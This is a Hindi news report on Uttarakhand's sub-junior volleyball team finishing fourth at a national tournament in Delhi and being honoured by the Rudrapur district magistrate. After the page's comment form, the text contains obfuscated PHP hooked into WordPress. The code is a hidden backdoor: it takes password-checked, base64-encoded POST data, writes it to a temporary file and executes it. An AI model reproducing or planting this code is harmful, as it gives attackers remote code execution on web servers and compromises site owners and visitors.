रुद्रपुर: 44वीं सब जूनियर वॉलीबॉल नेशनल प्रतियोगिता में उत्तराखंड की टीम को मिला चौथा स्थान

Uttarakhand Press News, 10 January 2023: रुद्रपुर: दिल्ली में आयोजित 44वीं सब जूनियर वॉलीबॉल नेशनल प्रतियोगिता (Sub Junior Volleyball National Competition) में उत्तराखंड की टीम ने देश में चौथा स्थान (Rudrapur team got fourth place) प्राप्त किया है. रुद्रपुर पहुंचने पर जिलाधिकारी युगल किशोर पंत (Rudrapur DM Couple Kishore Pant) ने सभी प्रतिभावान खिलाड़ियों को सम्मानित किया. इस मौके पर जिलाधिकारी ने कहा कि उन्हें उम्मीद है कि अगली बार टीम बेहतर प्रदर्शन कर पदक उत्तराखंड में लाएगी.

जिलाधिकारी ने जताई खुशी: गौर हो कि दिल्ली में हुई 44वीं सब जूनियर वॉलीबॉल नेशनल प्रतियोगिता में उत्तराखंड की टीम ने देश में चौथा स्थान प्राप्त किया. बीते दिन वॉलीबॉल टीम दिल्ली से उधम सिंह नगर जनपद पहुंची, जहां पर जिलाधिकारी युगल किशोर पंत ने खिलाड़ियों से वार्ता कर उन्हें सम्मानित किया. इस दौरान उत्तराखंड ओलंपिक एसोसिएशन (Uttarakhand Olympic Association) के महासचिव डॉक्टर डीके सिंह भी उपस्थित रहे. एसोसिएशन के महासचिव डॉक्टर डीके सिंह ने बताया कि 3 जनवरी से 8 जनवरी तक दिल्ली में 44वीं सब जूनियर वॉलीबॉल प्रतियोगिता का आयोजन हुआ था.

कड़ी मेहनत से पाया मुकाम: प्रतियोगिता में देश भर की 25 टीमों ने प्रतिभाग किया. लीग मैचों में उत्तराखंड की टीम ने बिहार, पश्चिम बंगाल, झारखंड, तमिलनाडु को हरा कर क्वार्टर फाइनल में प्रवेश किया था. क्वार्टर फाइनल में टीम ने राजस्थान को 3-0 से शिकस्त दी. जिसके बाद टीम उत्तराखंड का मैच मेजबान टीम दिल्ली से हुआ था. सेमीफाइनल में टीम को जद्दोजहद के बाद 3-2 से हार का सामना करना पड़ा. चौथी पोजिशन के लिए टीम द्वारा पोडियम फिनिस में चौथा स्थान पाया गया. इस दौरान फुटबॉल ओलंपिक द्वारा उत्तराखंड की टीम को 10 हजार का चेक और ट्रॉफी से सम्मानित किया गया. जिलाधिकारी युगल किशोर पंत ने बताया कि जूनियर टीम द्वारा बेहतर प्रदर्शन करते हुए देश भर में चौथा स्थान प्राप्त किया गया है. उन्होंने कहा कि उन्हें उम्मीद है कि अगली बार टीम पदक के साथ आयेगी. वहीं चौथा स्थान प्राप्त करने पर खिलाड़ी भी खासे उत्साहित हैं.

Read Previous

जोशीमठ: धंसते शहर में आज से ढहाए जाएंगे असुरक्षित भवन, सबसे पहले होटल मलारी इन और माउंट व्यू से होगी शुरुआत

Read Next

जापान: भारत की मित्रता में खराब मौसम के कारण नहीं उतर सका जापान के प्रतिनिधिमंडल का विमान

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}